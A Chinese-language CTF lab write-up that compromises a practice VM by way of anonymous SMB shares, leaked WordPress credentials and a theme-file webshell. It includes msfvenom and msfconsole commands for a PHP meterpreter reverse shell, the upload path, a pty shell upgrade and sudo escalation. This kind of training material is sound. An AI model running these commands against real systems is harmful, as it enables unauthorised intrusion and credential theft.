CTF实验：SMB信息泄露

---

SMB介绍：

---

SMB（Server Message Block）通信协议是微软（Microsoft）和英特尔(Intel)在1987年制定的协议，主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB，并称为samba。
SMB协议是基于TCP－NETBIOS下的，一般端口使用为139，445，SMB协议，计算机可以访问网络资源，下载对应的资源文件。

信息搜集

虚拟机使用NAT网络，kali输入ifconfig查看攻击机的ip，用netdiscover查看目标机器的IP；
然后用nmap扫描该ip。如图：nmap -sV ip ,( nmap -A -v -T4 ip).

分析探测结果

每一个服务对应计算机的一个端口，用来进行通信。常用端口 0~1023端口，在扫描结果中查找特殊端口
针对特殊端口进行探测，尤其对开发大端口的http服务进行排查；

可以看到目标机器开启了ssh服务，mysql，samba等服务。

针对SMB协议弱点分析

1.针对SMB协议，使用空口令，若口令尝试登陆，并查看敏感文件，下载查看；
– smbclient –L IP
– smbclient ‘\\IP$share’
– get 敏感文件

2.针对SMB协议远程溢出漏洞进行分析；

– searchsploit samba版本号

利用kali中smbclient登录

可以看出smb中有共享的三个文件print share和IPC
继续探查这些分享的文件夹smbclient ‘\IP$share’

print $打不开没有权限，在看share $ 进去了，用探查了IPC但没发现什么东西。
用ls查看share中的文件，用get命令将敏感文件下载下来deet.txt,查看deet，

看到password 12345，记下来。然后继续探测
打开wordpress文件，查看到有配置文件wp-config.php下载下来，编辑器查看


可以看到里面有Mysql database的用户名和密码。那么看看MySQL是否可以登录

mysql -u Admin -p 但登不上，再试试ssh能不能登上，也登不上，尝试失败。

在试试针对SMB协议远程溢出漏洞进行分析

searchsploit 版本号 看看有没有什么可供利用的漏洞。

也不行。

针对HTTP协议弱点分析

1. 浏览器查看网站；
2. 使用dirb nikto探测；
3. 寻找突破点，目标登录后台，上传webshell;

dirb ip 或 nikto -host ip

找到一个敏感地址，打开

试试之前在wp-config.php中发现的用户名和密码，登上了！
那么上传webshell。

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

cd 桌面
将代码复制到文件中，gedit webshell.php 保存到桌面

启动msfconsole，进行设置监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

获得反弹的shell

– wordpress 上传点 theme 404.php

执行：http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php
启动成功，监听成功。
shell进入终端
优化终端：python –c “import pty; pty.spawn(”/bin/bash")’

查找flag信息

查找敏感信息，提升root权限，查看flag值。

查找用户名: cat /etc/passwd
查找密码： 在共享目录下的敏感文件,提升权限
– su 用户名
– sudo –l
– su sudo
在home目录下有togie，切换到togie，之前记录的密码12345，成功登录！

sudo su 切换到root， ls查找相应文件。

---

总结

---

1.对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
2.一般情况下flag值都在/root目录下，并且需要提升root权限才能查看内容；